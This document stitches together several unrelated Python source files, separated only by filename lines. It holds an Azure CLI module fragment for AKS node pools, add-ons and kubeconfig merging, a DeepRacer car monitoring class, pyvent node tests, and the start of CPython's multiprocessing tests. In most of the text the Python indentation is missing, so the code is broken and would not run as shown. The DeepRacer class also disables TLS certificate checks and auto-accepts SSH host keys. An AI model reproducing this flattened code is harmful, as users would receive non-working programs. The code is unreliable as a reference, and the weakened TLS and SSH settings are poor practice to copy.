cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
no_wait=False):
update_flags = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_flags != 1:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
service_principal_client_id = instance.service_principal_profile.client_id
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_client_id, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {}" '
                                   'before enabling it again.'.format(resource_group_name))
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
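    # Merge one kubeconfig section (clusters/users/contexts): an entry whose name clashes
    # with an existing one replaces it when `replace` is set or the entries are identical;
    # otherwise the user is prompted, and declining (or having no TTY) raises an error.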
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
    if addition is None:
        raise CLIError('failed to load additional configuration from {}'.format(addition_file))
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_load_balancer_outbound_ips(load_balancer_outbound_ips):
"""parse load balancer profile outbound IP ids and return an array of references to the outbound IP resources"""
load_balancer_outbound_ip_resources = None
if load_balancer_outbound_ips:
load_balancer_outbound_ip_resources = \
[ResourceReference(id=x.strip()) for x in load_balancer_outbound_ips.split(',')]
return load_balancer_outbound_ip_resources
def _get_load_balancer_outbound_ip_prefixes(load_balancer_outbound_ip_prefixes):
"""parse load balancer profile outbound IP prefix ids and return an array \
of references to the outbound IP prefix resources"""
load_balancer_outbound_ip_prefix_resources = None
if load_balancer_outbound_ip_prefixes:
load_balancer_outbound_ip_prefix_resources = \
[ResourceReference(id=x.strip()) for x in load_balancer_outbound_ip_prefixes.split(',')]
return load_balancer_outbound_ip_prefix_resources
def _get_load_balancer_profile(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes):
"""parse and build load balancer profile"""
load_balancer_outbound_ip_resources = _get_load_balancer_outbound_ips(load_balancer_outbound_ips)
load_balancer_outbound_ip_prefix_resources = _get_load_balancer_outbound_ip_prefixes(
load_balancer_outbound_ip_prefixes)
load_balancer_profile = None
if any([load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ip_resources,
load_balancer_outbound_ip_prefix_resources]):
load_balancer_profile = ManagedClusterLoadBalancerProfile()
if load_balancer_managed_outbound_ip_count:
load_balancer_profile.managed_outbound_ips = ManagedClusterLoadBalancerProfileManagedOutboundIPs(
count=load_balancer_managed_outbound_ip_count
)
if load_balancer_outbound_ip_resources:
load_balancer_profile.outbound_ips = ManagedClusterLoadBalancerProfileOutboundIPs(
public_ips=load_balancer_outbound_ip_resources
)
if load_balancer_outbound_ip_prefix_resources:
load_balancer_profile.outbound_ip_prefixes = ManagedClusterLoadBalancerProfileOutboundIPPrefixes(
public_ip_prefixes=load_balancer_outbound_ip_prefix_resources
)
return load_balancer_profile
def cloud_storage_account_service_factory(cli_ctx, kwargs):
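    # Build a data-plane CloudStorageAccount client from the account name/key (or SAS
    # token) gathered by the caller; unused kwargs such as connection_string are discarded.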
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
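    # Poll the aks-periscope diagnostic custom resources ("apd") until every ready node has
    # reported, then print each node's network configuration and outbound connectivity
    # results as tables.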
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
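# Illustrative usage sketch (not part of the original module): the helpers
# above only wrap a message in ANSI bright/colour escape sequences. The URL
# below is a placeholder.
def _example_formatting():  # pragma: no cover
    print(format_bright('AKS diagnostics'))
    print(format_hyperlink('https://example.com/aks-periscope-docs'))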
|
silverstone.py
|
import requests
import tempfile
import shutil
import pysftp
import os
import threading
import time
import re
import logging
import paramiko
from urllib3.connection import ConnectTimeoutError
from dct.util.model import ModelMetadata, Model
class DeepRacerCar:
def __init__(self, ip, ssh_password=None, name="Car", verbose=False):
self.ip = ip
self.ssh_password = ssh_password
self.base_url = "https://{}".format(ip)
self.name = name
self.carThread = threading.Thread(target=self.monitor)
self.carThread.daemon = True
self.logThread = threading.Thread(target=self.roslog)
self.logThread.daemon = True
self.tmpdir = tempfile.mkdtemp()
self.session = requests.Session()
self.session.verify = False
self.connected = False
self.model_name = None
self.throttle = None
self.car_driving = None
self.battery_level = None
self.camera_status = None
self.stereo_status = None
self.lidar_status = None
self.verbose = verbose
def __del__(self):
if os.path.exists(self.tmpdir):
shutil.rmtree(self.tmpdir)
def roslog(self):
while True:
try:
with paramiko.SSHClient() as client:
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
self.ip, 22, "deepracer", self.ssh_password, timeout=2
)
stdin, stdout, stderr = client.exec_command(
"source /opt/ros/kinetic/setup.bash; rostopic echo /rosout_agg/msg",
)
for line in iter(lambda: stdout.readline(2048), ""):
self._update_log_values(line)
except Exception as e:
print(e)
finally:
# Retry every 5 seconds.
time.sleep(5)
def monitor(self):
while True:
try:
if not self.connected:
self._connect()
# Update battery level
self._update_battery_level()
# Update sensor info
self._update_sensor_status()
if self.verbose:
print(self)
except Exception as e:
self.connected = False
print(e)
logging.info("Car '{}' disconnected".format(self.name))
finally:
# Update every 10 seconds.
time.sleep(10)
def __str__(self):
return "[{}]: Model: {} - Battery: {} - Driving: {} - Throttle: {}%".format(
self.name,
            self.model_name,
self.battery_level,
self.car_driving,
self.throttle if self.throttle is not None else "?",
)
def connect(self):
self.carThread.start()
self.logThread.start()
def _connect(self):
try:
logging.info("Attempting to connect to {}".format(self.name))
deepracer_token_path = os.path.join(self.tmpdir, "token.txt")
# Use SSH to get the deepracer token from the cookie.
with pysftp.Connection(
self.ip, username="deepracer", password=self.ssh_password
) as sftp:
logging.info("Downloading token for {}".format(self.name))
sftp.get(
"/opt/aws/deepracer/token.txt",
deepracer_token_path,
)
with open(deepracer_token_path, "r") as f:
self.cookie = "deepracer_token={}".format(f.readlines()[0])
self.session.headers["Cookie"] = self.cookie
self.connected = True
logging.info("Car '{}' connected!".format(self.name))
except ConnectTimeoutError:
self.connected = False
logging.info("Timeout connecting to car '{}'".format(self.name))
return
except Exception as e:
logging.debug(e)
def load_model(self, model_name):
logging.info(
"Loading model '{}' from car '{}'' at {}".format(
model_name, self.name, self.ip
)
)
with pysftp.Connection(
self.ip, username="deepracer", password=self.ssh_password
) as sftp:
base_path = os.path.join(self.tmpdir, model_name)
if not os.path.exists(base_path):
os.makedirs(base_path)
model_path = os.path.join(self.tmpdir, model_name, "model.pb")
metadata_path = os.path.join(self.tmpdir, model_name, "model_metadata.json")
if not os.path.exists(model_path):
sftp.get(
"/opt/aws/deepracer/artifacts/{}/model.pb".format(model_name),
model_path,
)
if not os.path.exists(metadata_path):
sftp.get(
"/opt/aws/deepracer/artifacts/{}/model_metadata.json".format(
model_name
),
metadata_path,
)
metadata = ModelMetadata.from_file(metadata_path)
return Model.from_file(model_path, metadata), metadata
def camera_feed(self, width=480, height=360, quality=90, topic="display_mjpeg"):
assert topic in ["display_mjpeg", "overlay_msg"], "Camera topic not supported!"
return "{}/route?topic=/{}&width={}&height={}&quality={}".format(
self.base_url, topic, width, height, quality
)
def _update_battery_level(self):
res = self.session.get(
"{}/api/get_battery_level".format(self.base_url), timeout=20
)
if res.status_code != 200:
raise Exception("Error updating car battery level.")
out = res.json()
if out["success"] is True and self.battery_level != out["battery_level"]:
self.battery_level = out["battery_level"]
logging.info(
"{} battery level changed: {}".format(self.name, self.battery_level)
)
def _update_sensor_status(self):
res = self.session.get(
"{}/api/get_sensor_status".format(self.base_url), timeout=20
)
if res.status_code != 200:
raise Exception("Error updating car sensor status.")
out = res.json()
if out["success"] is True:
if self.camera_status != out["camera_status"]:
self.camera_status = out["camera_status"]
logging.info(
"Car '{}' camera_status changed: {}".format(
self.name, self.camera_status
)
)
if self.stereo_status != out["stereo_status"]:
self.stereo_status = out["stereo_status"]
logging.info(
"Car '{}' stereo_status changed: {}".format(
self.name, self.stereo_status
)
)
if self.lidar_status != out["lidar_status"]:
self.lidar_status = out["lidar_status"]
logging.info(
"Car '{}' lidar_status changed: {}".format(
self.name, self.lidar_status
)
)
def _update_log_values(self, line):
if line == "---\n":
return
line = line.lstrip('"').rstrip('"\n')
# Check if car is running
match = re.search(r"Inference task .* has (.*)", line)
if match:
state = match[1]
            car_driving = (state == "started")
if self.car_driving != car_driving:
self.car_driving = car_driving
logging.info(
"Car '{}' driving state changed: {}".format(
self.name, self.car_driving
)
)
return
# Find currently loaded model.
match = re.search(r"Model '(.*)' is installed", line)
if match:
if self.model_name != match[1]:
self.model_name = match[1]
logging.info(
"Car '{}' loaded model changed: {}".format(
self.name, self.model_name
)
)
return
# Find last throttle value.
match = re.search(r"Setting throttle to (\d+\.\d+)", line)
if match:
throttle = float(match[1]) * 100
if self.throttle != throttle:
self.throttle = throttle
logging.info(
"Car '{}' throttle changed: {}".format(self.name, self.throttle)
)
return
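# Illustrative usage sketch (not part of the original module). The IP address
# and SSH password below are placeholders.
if __name__ == '__main__':  # pragma: no cover
    car = DeepRacerCar('192.168.1.10', ssh_password='changeme', name='MyCar', verbose=True)
    car.connect()              # starts the monitor and ROS-log background threads
    print(car.camera_feed())   # MJPEG stream URL served by the car's web interface
    time.sleep(30)             # let the monitor print status for a while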
|
node_test.py
|
import time
from pyvent.node import Node
import nose.tools as nt
from multiprocessing import Process, Value
S = Value('i', 0)
def send_fn(signal='event', delay=0.25, **kargs):
n = Node(id='process', server=False)
time.sleep(delay)
n.send(signal, **kargs)
time.sleep(delay)
def listen_fn(signal='event', delay=1):
n = Node()
@n.connect(signal)
def fn(arg):
S.value = arg
time.sleep(delay)
def test_is_alive():
node = Node()
nt.assert_false(node.is_server())
node.start_server()
nt.assert_true(node.is_server())
node.stop()
nt.assert_false(node.is_server())
def test_start():
node = Node()
nt.assert_false(node.is_server())
hit = False
@node.connect('test')
def fn():
nonlocal hit
hit = True
nt.assert_true(node.is_server())
nt.assert_false(hit)
time.sleep(0.1)
node.send('test')
time.sleep(0.1)
nt.assert_true(hit)
node.stop()
def test_emit():
p = Process(target=listen_fn)
p.start()
n = Node()
time.sleep(0.1)
n.send('event', arg=1)
time.sleep(0.1)
nt.assert_equal(S.value, 1)
nt.assert_false(n.is_server())
time.sleep(0.1)
n.send('event', arg=2)
time.sleep(0.1)
nt.assert_equal(S.value, 2)
n.stop()
p.terminate()
def test_emit_2():
n = Node()
nt.assert_true(n.send('event', arg=3))
p = Process(target=listen_fn)
p.start()
time.sleep(0.2)
n.send('event', arg=3)
time.sleep(0.2)
nt.assert_equal(S.value, 3)
nt.assert_true(n.is_server())
time.sleep(0.2)
n.send('event', arg=2)
time.sleep(0.2)
nt.assert_equal(S.value, 2)
n.stop()
p.terminate()
def test_stop_start():
n = Node()
n.start_server()
n.stop()
n.start_server()
def test_delete():
n = Node()
n.send('test')
n2 = Node()
n2.send('test')
nt.assert_true(n.is_server())
nt.assert_false(n2.is_server())
del n
n3 = Node()
n3.send('test')
nt.assert_true(n3.is_server())
def test_restart():
n = Node()
n.send('test')
n2 = Node()
n2.send('test')
# n2.send('test')
def test_wait_for():
n = Node()
n.start_server()
p = Process(target=send_fn, kwargs={'arg1': 'value'})
time.sleep(0.1)
p.start()
args, kargs = n.wait_for('event', timeout=1)
nt.assert_equal(kargs['arg1'], 'value')
nt.assert_equal(args, ())
p.terminate()
def test_wait_for_timeout():
n = Node()
n.start_server()
#
args, kargs = n.wait_for('event', timeout=1)
nt.assert_equal(args, None)
nt.assert_equal(kargs, None)
def test_wait_with_send():
n = Node()
n.try_start()
time.sleep(0.5)
args, kargs = n.wait_for('test_event', timeout=2, send={'signal': 'test_event', 'value': 1})
nt.assert_equal(kargs['value'], 1)
def test_configure():
n = Node()
n.try_start()
time.sleep(1)
n.configure(server=False)
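# Illustrative sketch (not part of the original test module): a minimal
# publish/subscribe round trip with pyvent, mirroring the tests above.
def _example_round_trip():  # pragma: no cover
    n = Node()
    received = []
    @n.connect('ping')
    def _on_ping(value):
        received.append(value)
    time.sleep(0.1)
    n.send('ping', value=42)
    time.sleep(0.1)
    n.stop()
    return received  # expected: [42]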
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support helper can be reused.
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
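# Illustrative sketch (not part of the original test suite): TimingWrapper
# records how long the wrapped callable took in its .elapsed attribute.
def _example_timing_wrapper():  # pragma: no cover
    slow_sleep = TimingWrapper(time.sleep)
    slow_sleep(0.05)
    return slow_sleep.elapsed  # roughly 0.05 seconds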
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
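# Illustrative sketch (not part of the original test suite): the fallback
# chain above also works for a plain threading.Semaphore via its _value
# attribute.
def _example_get_value():  # pragma: no cover
    sem = threading.Semaphore(3)
    return get_value(sem)  # 3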
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
